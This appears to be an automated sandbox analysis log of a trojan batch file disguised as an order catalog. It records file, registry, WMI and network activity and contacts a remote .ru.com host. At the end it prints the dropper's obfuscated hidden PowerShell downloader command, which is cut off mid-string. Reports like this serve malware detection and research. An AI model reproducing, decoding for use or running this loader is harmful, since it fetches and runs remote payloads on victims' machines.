Source: unknown |
HTTPS traffic detected: 103.83.194.50:443 -> 192.168.2.16:49702 version: TLS 1.2 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: cohabitais.ru.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49702 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49702 |
Source: unknown |
HTTPS traffic detected: 103.83.194.50:443 -> 192.168.2.16:49702 version: TLS 1.2 |
Source: C:\Windows\System32\svchost.exe |
File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp |
Source: C:\Windows\System32\cmd.exe |
Process created: Commandline size = 7526 |
Source: C:\Windows\System32\cmd.exe |
Process created: Commandline size = 7526 |
Source: unknown |
Process created: Commandline size = 7550 |
Source: classification engine |
Classification label: mal60.troj.winBAT@8/7@1/38 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Roaming\Suspendibility.Lum |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2t3exdl0.jae.ps1 |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ORDER AND CATALOG 01.bat" " |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6852 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File read: C:\Users\desktop.ini |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ORDER AND CATALOG 01.bat" " |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrier |